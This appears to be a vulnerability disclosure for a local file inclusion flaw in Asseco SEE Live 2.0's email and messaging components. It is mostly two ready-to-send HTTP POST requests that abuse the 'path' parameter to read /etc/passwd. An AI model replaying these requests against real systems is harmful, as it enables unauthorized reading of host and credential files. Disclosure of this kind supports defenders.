Asseco SEE Live 2.0 的 Contact Plan、E-Mail、SMS 和 Fax 组件中存在本地文件包含漏洞,允许远程认证用户通过 downloadAttachment 和 downloadAttachmentFromPath API 调用中的 "path" 参数访问主机上的文件。
这些 HTTP 请求需要低权限认证。
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"
HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"
Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"
[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"
/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"
[REDACTED]
------WebKitFormBoundary--
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"
HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"
Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"
/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"
[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"
Template
------WebKitFormBoundary--